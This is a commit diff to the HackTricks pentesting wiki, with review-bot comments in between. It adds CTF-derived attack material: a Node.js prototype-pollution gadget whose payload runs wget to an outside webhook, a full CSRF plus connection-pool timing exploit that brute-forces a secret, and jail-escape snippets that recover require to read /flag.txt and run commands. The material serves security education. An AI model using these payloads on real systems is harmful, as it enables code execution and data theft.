mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
GITBOOK-4028: change request with no subject merged in GitBook
This commit is contained in:
parent cfc006dba6
commit 751055cd29
4 changed files with 324 additions and 13 deletions
@ -649,7 +649,7 @@
* [XSS Tools](pentesting-web/xss-cross-site-scripting/xss-tools.md)
* [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md)
* [XS-Search/XS-Leaks](pentesting-web/xs-search.md)
* [Connection Pool Example](pentesting-web/xs-search/connection-pool-example.md)
* [Connection Pool Examples](pentesting-web/xs-search/connection-pool-example.md)
* [Connection Pool by Destination Example](pentesting-web/xs-search/connection-pool-by-destination-example.md)
* [Cookie Bomb + Onerror XS Leak](pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md)
* [URL Max Length - Client Side](pentesting-web/xs-search/url-max-length-client-side.md)
@ -7,7 +7,7 @@
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>
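Review bot: the `🐦` icon in the **Join the** line still points at a dead target (`https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md`, a GitHub tree URL with an escaped bracket and an emojipedia path glued onto it), while this hunk only escapes the underscore in the following `hacktricks_live` URL. Since the `💬` icon links directly to `https://emojipedia.org/speech-balloon/`, point the bird icon at the matching emojipedia page (or drop the icon link) so the banner has no broken link. The `\_` escape itself is harmless: CommonMark unescapes backslashes inside link destinations, so both spellings resolve to the same URL.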
@ -678,6 +678,29 @@ fork('/path/to/anything');
{% endtab %}
{% endtabs %}

#### Relative require - 3

Similar to the previous one, this was found in [**this writeup**](https://blog.huli.tw/2022/12/26/en/ctf-2022-web-js-summary/#balsn-ctf-2022-2linenodejs).

```javascript
// Requiring /opt/yarn-v1.22.19/preinstall.js
Object.prototype["data"] = {
exports: {
".": "./preinstall.js"
},
name: './usage'
}
Object.prototype["path"] = '/opt/yarn-v1.22.19'
Object.prototype.shell = "node"
Object.prototype["npm_config_global"] = 1
Object.prototype.env = {
"NODE_DEBUG": "console.log(require('child_process').execSync('wget${IFS}https://webhook.site?q=2').toString());process.exit()//",
"NODE_OPTIONS": "--require=/proc/self/environ"
}

require('./usage.js')
```

## VM Gadgets

In the paper [https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf) is also indicated that the control of **`contextExtensions`** from some methods of the **`vm`** library could be used as a gadget.\
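Review bot: the new "Relative require - 3" subsection drops the gadget in without saying which polluted properties matter or why; one sentence before the block would fix that. From the lines shown: polluting `Object.prototype.data` (with its `exports` map pointing `"."` at `./preinstall.js`) and `Object.prototype.path` redirects `require('./usage.js')` to `/opt/yarn-v1.22.19/preinstall.js`; the polluted `shell`, `npm_config_global` and `env` values are then picked up when that script spawns a child process, and `NODE_OPTIONS=--require=/proc/self/environ` makes the child `node` load its own environment block as a script, with `NODE_DEBUG` supplying the JavaScript and the trailing `//` commenting out the rest of the environment. Two caveats belong in the text as well: the path is tied to that exact yarn install (`/opt/yarn-v1.22.19`), and the `wget ... https://webhook.site?q=2` command is just the writeup's callback placeholder, not part of the gadget. A "proof" line a reader could check (for example, that the `process.exit()` prevents `usage.js` from continuing) would make the snippet self-explanatory.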
@ -706,7 +729,7 @@ In [**this commit**](https://github.com/nodejs/node/commit/0313102aaabb49f78156c
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>
@ -1,4 +1,4 @@
# Connection Pool Example
# Connection Pool Examples

<details>
@ -7,11 +7,13 @@
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Sekaictf2022 - safelist

In the [**Sekaictf2022 - safelist**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/safelist/solution) challenge, [**@Strellic\_**](https://twitter.com/Strellic\_) gives an example of how to use a **variation** of the **Connection Pool** technique to perform a **XS-Leak**.

In this challenge, the goal is to exfiltrate a flag that will appear in the bots web session inside a post. These are the assets the attacker has:
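Review bot: two wording nits in the retained context of this hunk, since the page heading was just renamed anyway: "perform a **XS-Leak**" should be "perform an **XS-Leak**", and "the bots web session" should be "the bot's web session".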
@ -294,6 +296,222 @@ Same tactic but different code from [https://blog.huli.tw/2022/10/05/en/sekaictf
</html>
```

## DiceCTF 2022 - carrot

In this case the first step of the exploit was to abuse a CSRF to modify the page where the flag is contained so it has **much more content** (and therefore loading it takes more time), and then **abuse the connection pool to measure the time it takes to access the page** that could be potentially having the flag.

In the exploit you can see:

* Abuse CSRF
* Occupy all the sockets but 1
* Calibrate the response
* Start bruteforcing by accessing the potential page with the flag
* The potential page will be accessed and immediately an attackers controlled URL will also be accessed to check how much time both requests take.

```html
<h1>DiceCTF 2022 web/carrot</h1>

<p>Step 1: CSRF the admin user, to set a super long title for the flag note (LAX + POST form only possible for 2 minutes after cookies is created)</p>
<button onclick="csrf()">do csrf</button>
<p>Step 2: XS-Search with <a href="https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/">connection-pool timing leak</a>, we have to use window.open (LAX cookie)</p>

<button onclick="popunder()">open popup</button>
<button onclick="exhaust_sockets()">open 255 connections</button>
<button onclick="oracle('dice{abc')">test search "abc" (slow)</button>
<button onclick="oracle('dice{xxx')">test search "xxx" (fast)</button>
<br>
<br>
<h2 id=output></h2>
<br>
<form id=x action="" method="POST" style="display:none;">
<input type="text" name="title" placeholder="title">
<br><br>
<input type="number" name="priority" placeholder="priority" value=9999>
<br><br>
<textarea name="content" placeholder="content" rows="5" cols="20"></textarea>
<br><br>
<input type="submit" value="submit">
</form>

<script>

// this is send is used as logging
LOG = 'Starting'
// 255 in normal chrome, 99 in headless
SOCKETLIMIT = 255;
// default
TIMELIMIT = 800;
INSTANCE = ''
MYSERVER = `example.com`

const sleep = (ms) => {
return new Promise(resolve => {
setTimeout(resolve, ms);
});
}

const time_fetch = async() => {
let test_server_url = `https://${MYSERVER}/?${LOG}`;
let start = window.performance.now();
try {
await fetch(test_server_url, {
mode: 'no-cors'
});
} catch (e) {
console.log(e);
}
let end = window.performance.now();
return end - start;
}

const fetch_sleep_long = (i) => {
// 40s sleep
return fetch(`https://${i}.${MYSERVER}/40sleep`, {
mode: 'no-cors'
});
}

const fetch_sleep_short = (i) => {
// 0.25s sleep
return fetch(`https://${i}.${MYSERVER}/ssleep`, {
mode: 'no-cors'
});
}

const block_socket = async (i) => {
fetch_sleep_long(i);
// needed?
await sleep(0);
}

const exhaust_sockets = async() => {
let i = 0
for (; i < SOCKETLIMIT; i++) {
block_socket(i);
}
console.log(`Used ${i} connections`);
}

const timeit = async (url, popup) => {
return new Promise(async (r) => {

popup.location = url;
// needed?
await sleep(50)

let val = await time_fetch()
r(val)
});
}

// const alphabet = '_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-}!"#$%&\'()*+,-./:;<=>?@[\\]^`|~{'.split('');
const alphabet = 'abcdefghijklmnopqrstuvwxyz}_'.split('');
// const alphabet = 'abcdef}'.split('');

const oracle = async (search) => {
let url = `https://carrot-${INSTANCE}.mc.ax/tasks?search=${search}`
let t = await timeit(url, WINBG)

LOG = `${search}:${t}`
console.log(`${search}:${t}`)

return t > TIMELIMIT
}

const brute = async (flag) => {
for (const char of alphabet) {
if (await oracle(flag + char)) {
return char;
}
}
return false;
}

const calibrate = async () => {
return new Promise(async (r) => {
// slow
let url1 = `https://carrot-${INSTANCE}.mc.ax/tasks?search=dice{`
let t1 = await timeit(url1, WINBG)
console.log(`slow:${t1}`)
// fast
let url2 = `https://carrot-${INSTANCE}.mc.ax/tasks?search=XXXXXXXXXX`
let t2 = await timeit(url2, WINBG)
console.log(`fast:${t2}`)
return r((t1 + t2) / 2)
});

}

const exploit = async(flag = '') => {
console.log('Starting')
// dont go to fast plz :)
console.log(`waiting 3s`)
await sleep(3000)
// exaust sockets
await exhaust_sockets()
await sleep(2000)
LOG = `Calibrating`
TIMELIMIT = await calibrate()
LOG = `TIMELIMIT:${TIMELIMIT}`
console.log(`timelimit:${TIMELIMIT}`)
await sleep(2000)
let last;
while (true) {
last = await brute(flag);
if (last === false) {
return flag;
}
else {
flag += last;
output.innerText = flag;
if(last === '}'){
return flag
}
}
}
}

const popunder = () => {
if (window.opener) {
WINBG = window.opener
}
else {
WINBG = window.open(location.href, target="_blank")
location = `about:blank`
}
}

const csrf = async () => {
x.action = `https://carrot-${INSTANCE}.mc.ax/edit/0`
x.title.value = "A".repeat(1000000)
x.submit()
}

window.onload = () => {
let p = new URL(location).searchParams;
if(!p.has('i')){
console.log(`no INSTANCE`)
return
}
INSTANCE = p.get('i')
// step 1
if(p.has('csrf')){
csrf()
return
}
// step 2
if (p.has('exploit')) {
// window open is ok in headless :)
popunder()

exploit('dice{')
}
}
</script>
```



<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
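Review bot: the bullet list above the carrot exploit omits what the reader has to provide before the HTML does anything: `MYSERVER` must serve `/40sleep` (an endpoint that holds the connection for about 40 s, so that each of the `SOCKETLIMIT` fetches keeps one socket busy) and `/ssleep`, it must accept the `/?<LOG>` requests that `time_fetch` uses both as the timing probe and as the logging channel, and the page expects `?i=<instance>` plus a `csrf` or `exploit` query flag. One sentence stating that, and that "Occupy all the sockets but 1" is why the measured request and the popup navigation end up queued on the same connection, would make the list match the code. Code nits, for the writeup rather than the diff: the comment `// this is send is used as logging` is garbled ("this is sent to the server as a log line"); `window.open(location.href, target="_blank")` creates an implicit global `target` instead of passing `"_blank"` as the second argument; `fetch_sleep_short` is defined but never called; and `block_socket` intentionally does not `await` the fetch, which deserves a comment since the `// needed?` beside it suggests otherwise. The `SOCKETLIMIT` comment (255 in normal Chrome, 99 in headless) is the kind of environment-specific number that should also be stated in the prose, because the whole measurement only works once the pool is actually full.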
@ -301,7 +519,7 @@ Same tactic but different code from [https://blog.huli.tw/2022/10/05/en/sekaictf
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>
@ -196,7 +196,7 @@ Some **examples**:

When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\
For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\
_**Note: A HTML comment can be closed using\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\***** ****`-->`**** ****or \*\*\*\*****`--!>`**_
_**Note: A HTML comment can be closed using**** ****`-->`**** ****or**** ****`--!>`**_

In this case and if no black/whitelisting is used, you could use payloads like:

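Review bot: the replacement note line removes the `\*\*\*\*` escape run, but the `****` spacers it keeps render as empty bold and could go as well; the fact itself is right (the HTML parser accepts both `-->` and `--!>` as a comment terminator, which is why a `<!--` that wraps attacker input is not a safe neutraliser). While touching this paragraph, the surrounding context lines need grammar fixes too: "the **first** thing you need to do if check" should read "is to check", "or **deleted** of if it is" should read "or **deleted**, or whether it is", "For this cases" should read "In these cases", and "A HTML comment" should read "An HTML comment".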
@ -964,7 +964,7 @@ const char* const kSupportedJavascriptTypes[] = {
The answer is:

* **module** (default, nothing to explain)
* \*\*\*\*[**webbundle**](https://web.dev/web-bundles/): Web Bundles is a feature that you can package a bunch of data (HTML, CSS, JS…) together into a **`.wbn`** file.
* [**webbundle**](https://web.dev/web-bundles/): Web Bundles is a feature that you can package a bunch of data (HTML, CSS, JS…) together into a **`.wbn`** file.

```html
<script type="webbundle">
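Review bot: dropping the stray `\*\*\*\*` before the `webbundle` link is right, but the sentence still has a broken verb: "Web Bundles is a feature that you can package a bunch of data (HTML, CSS, JS…) together into a **`.wbn`** file" should read "Web Bundles let you package a bunch of resources (HTML, CSS, JS…) together into a single **`.wbn`** file". The same one-character cleanup is applied to the `importmap` and `speculationrules` items below; "Allows to improve the import syntax" in the `importmap` item would read better as "lets a page control how bare import specifiers are resolved", which is also the property the XSS writeup on this page abuses.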
@ -976,7 +976,7 @@ The answer is:
The resources are loaded from the source .wbn, not accessed via HTTP
```

* \*\*\*\*[**importmap**](https://github.com/WICG/import-maps)**:** Allows to improve the import syntax
* [**importmap**](https://github.com/WICG/import-maps)**:** Allows to improve the import syntax

```html
<script type="importmap">
@ -997,7 +997,7 @@ import { partition } from "lodash";

This behaviour was used in [**this writeup**](https://github.com/zwade/yaca/tree/master/solution) to remap a library to eval to abuse it can trigger XSS.

* \*\*\*\*[**speculationrules**](https://github.com/WICG/nav-speculation)**:** This feature is mainly to solve some problems caused by pre-rendering. It works like this:
* [**speculationrules**](https://github.com/WICG/nav-speculation)**:** This feature is mainly to solve some problems caused by pre-rendering. It works like this:

```html
<script type="speculationrules">
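Review bot: the context line "to remap a library to eval to abuse it can trigger XSS" is hard to parse; suggest "to remap a library import onto `eval`, so that the page's own `import` of that library ends up executing attacker-controlled input". The `speculationrules` item would also benefit from one clause saying why it is listed here, namely that it is another `<script type="...">` value that the browser does not treat as executable JavaScript, which is the property the list above is enumerating.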
@ -1050,7 +1050,11 @@ For example in [**this writeup**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA)

### Chrome Cache to XSS

### XS Jails
{% content-ref url="chrome-cache-to-xss.md" %}
[chrome-cache-to-xss.md](chrome-cache-to-xss.md)
{% endcontent-ref %}

### XS Jails Escape

If you are only have a limited set of chars to use, check these other valid solutions for XSJail problems:

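Review bot: the heading split is correct (the `chrome-cache-to-xss.md` content-ref now sits under "Chrome Cache to XSS" instead of under "XS Jails"), but "If you are only have a limited set of chars to use" in the retained line should read "If you only have a limited set of characters to use". Because this is a new `### XS Jails Escape` heading, a one-line definition (JavaScript jails that restrict the character set or remove globals before running untrusted code, which is what the following examples escape from) would orient readers who arrive via the summary; the terms "XS Jails" and "XSJail" are otherwise used without introduction.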
@ -1085,6 +1089,72 @@ with(this)
// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
```

If **everything is undefined** before executing untrusted code (like in [**this writeup**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/#miscx2fundefined55-solves)) it's possible to generate useful objects "out of nothing" to abuse the execution of arbitrary untrusted code:

* Using import()

```javascript
// although import "fs" doesn’t work, import('fs') does.
import("fs").then(m=>console.log(m.readFileSync("/flag.txt", "utf8")))
```

* Accessing `require` indirectly

[According to this](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050) modules are wrapped by Node.js within a function, like this:

```javascript
(function (exports, require, module, __filename, __dirname) {
// our actual module code
});
```

Therefore, if from that module we can **call another function**, it's possible to use `arguments.callee.caller.arguments[1]` from that function to access **`require`**: 

{% code overflow="wrap" %}
```javascript
(function(){return arguments.callee.caller.arguments[1]("fs").readFileSync("/flag.txt", "utf8")})()
```
{% endcode %}

In a similar way to the previous example, it's possible to **use error handlers** to access the **wrapper** of the module and get the **`require`** function:

```javascript
try {
null.f()
} catch (e) {
TypeError = e.constructor
}
Object = {}.constructor
String = ''.constructor
Error = TypeError.prototype.__proto__.constructor
function CustomError() {
const oldStackTrace = Error.prepareStackTrace
try {
Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace
Error.captureStackTrace(this)
this.stack
} finally {
Error.prepareStackTrace = oldStackTrace
}
}
function trigger() {
const err = new CustomError()
console.log(err.stack[0])
for (const x of err.stack) {
// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter
const fn = x.getFunction()
console.log(String(fn).slice(0, 200))
console.log(fn?.arguments)
console.log('='.repeat(40))
if ((args = fn?.arguments)?.length > 0) {
req = args[1]
console.log(req('child_process').execSync('id').toString())
}
}
}
trigger()
```

### Obfuscation & Advanced Bypass

* **Different obfuscations in one page:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
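Review bot: both `require` recovery snippets depend on sloppy-mode function internals and the text should say so: `arguments.callee` throws a TypeError in strict mode, `x.getFunction()` returns `undefined` for strict-mode frames, and reading `fn.arguments` on a strict-mode function throws as well, so neither trick works when the module wrapper or the caller runs under `'use strict'`, as an ES module, or inside a class body. In the `prepareStackTrace` block, `args` and `req` are assigned without `let`/`const` (implicit globals, and a ReferenceError under strict mode), and the unguarded `console.log(fn?.arguments)` runs before the guarded access, so a single frame whose `arguments` is inaccessible aborts the whole loop; wrap the read in a try/catch or drop the debug line. The `err.stack[0]` access only works because `prepareStackTrace` returned the structured call-site array rather than a string, which deserves a comment, and "arugments" in the loop comment is a typo. Since the section's own premise is that every global was deleted and the snippets still reach `import()`, the module wrapper and `Error.captureStackTrace`, it is worth stating the takeaway plainly: scrubbing globals inside the same V8 context is not a sandbox, and untrusted code needs a separate process or isolate.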
@ -1359,9 +1429,9 @@ You can also use: [https://xsshunter.com/](https://xsshunter.com)
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
```

### Find Hidden Content
### Regex - Access Hidden Content

From [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay) it's possible to learn that even if some values dissapear from JS, it's still possible to find them in JS attributtes in different objects. For example, an input of a REGEX is still possible to find it after the value of the input of the regex was removed:
From [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay) it's possible to learn that even if some values disappear from JS, it's still possible to find them in JS attributes in different objects. For example, an input of a REGEX is still possible to find it after the value of the input of the regex was removed:

```javascript
// Do regex with flag
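Review bot: renaming the heading from "Find Hidden Content" to "Regex - Access Hidden Content" changes the section's anchor, so any in-repo links to `#find-hidden-content` need updating (none are visible in this diff, but worth a grep before merging). The spelling fixes ("dissapear", "attributtes") are right; the second sentence still needs rewording, e.g. "for example, the string a regex was last matched against can still be recovered after the value it came from was removed", which also says what the `// Do regex with flag` block below is demonstrating.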